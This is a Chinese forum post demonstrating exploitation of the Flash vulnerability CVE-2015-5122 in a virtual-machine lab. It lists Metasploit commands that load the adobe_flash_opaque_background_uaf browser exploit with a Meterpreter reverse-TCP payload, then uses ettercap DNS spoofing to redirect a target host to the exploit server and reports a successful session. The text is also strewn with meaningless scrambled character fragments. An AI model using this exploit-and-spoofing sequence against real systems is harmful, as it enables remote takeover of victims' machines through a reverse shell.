找回密码
 立即注册
查看: 2542|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ h" J9 {5 N7 G" ~* ^& X 二、cve2015-5122漏洞实例演示虚拟机 & s/ ^" ~; h5 l' h8 w6 @; _

3 H! q# V/ F5 B7 z7 f

$ d+ w) G2 ~; @$ l   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: & |, H! R, j4 v( C/ ^% \ ^- D

; @( ?+ i8 p" r7 D$ Y( c" x

4 ]( E( V* E1 D1 e search cve-2015-5122如图: ) Q; b, |5 y8 c

% g6 v: l: @$ v% {6 X% X1 a; k

' h$ l/ A3 f3 o7 M9 z L   8 Q, D. v, J6 f( J- o6 F0 P9 _

3 T0 l8 Q5 U7 p% w6 z! f

# I) Y w% q! A3 Q W5 ? 下面我们敲如下命令: 5 v2 x! y: r0 ]- x% Z

3 @ z( d+ ]- b9 }

3 f! {, H* m7 o0 R6 t- r use exploit/multi/browser/adobe_flash_opaque_background_uaf 8 L8 E! J, q4 L

M& T% c3 f/ S* Y$ a

3 }) _* F( Y" i, f V4 ? set PAYLOAD windows/meterpreter/reverse_tcp ( x m( C3 e4 Q9 V

0 i2 U" q1 R( E& I- L$ C

8 }" O- t# t3 ^# \ set LHOST 192.168.0.109 1 ]5 [9 M& R- I8 O

+ w, q3 j9 E$ k2 z7 p

" [/ t1 G% R( @- [1 N set URIPATH /                        /*根目录*/ 1 u" i1 c) g! j

& d) b8 F/ f' U, g4 Q8 y5 a

, J: V1 N; U' M: F9 B set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 % F6 d0 E5 k5 x- k" i

\ E8 @6 k/ \( ~! u% I

$ h( `- U4 q1 e/ _0 `/ w/ Q set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 / F" R% r6 V( ]! X2 n( F: R& Y

0 M3 w& h& H1 H' X& N. _7 g" B

. P1 _1 O( s# S! C- V( ^8 ~) @ 然后show options如图: # W0 t" v+ x9 Y

( V# A- i* E- e2 A& U: v u

1 e, }* \- B( u* g# n   : b3 n3 M7 t+ d: d! O

+ L* Z+ A% w# ?7 u1 n1 H/ v5 N/ a! f

. S. N. I5 W+ C: b' R( D 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
5 a& b! e* p2 r/ h% \! Z
8 O! J/ Y* q) l% e$ @

) i) ^% ?4 s6 g

" T! c- F3 F9 a, m" ] 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 / Q, E1 m% w L; \+ v/ Z2 {6 R- L# d

6 f- W5 K9 L @( C4 [( M- r+ g

5 C4 N$ d/ a5 a7 L: S- _ Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf % a/ i3 z, R* R% }: `1 c' _

% a$ U+ _0 J; y4 t. S& x( J7 Z

( K I' O+ i/ d   # b: x" N# D% X9 j& n. c# }

9 Q9 |+ Z1 u! \* O% k }) F

* v+ f) `. F$ H8 g: ^6 Z 成功了,这时候我们断开ettercap,如图: 0 K/ ~* x( h* i$ n5 `; p& |9 }6 a

) ~: p; ^, a# X+ c# L+ a( H1 z

0 h9 Z' }8 ^) g3 p9 J1 M7 z* [   7 _; B1 k1 y, D3 l3 J$ a: K

2 o/ ]2 R! s2 X" y1 F& [0 V* v

4 |: p- v& Y% w# K8 ? Screenshot如图: & D# |; p) z1 X# { w6 S

; a9 c& m" Y8 q8 s# I0 k" n8 s ^

+ B- o' Y2 j& g! C! q8 }   # @( h$ E1 N: ~/ Z

% L. O7 h: D. \) u1 K

4 a, |9 d% _: D# U+ J" y7 V9 o+ M! @ 1 e1 k1 C* y# B0 s7 b

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表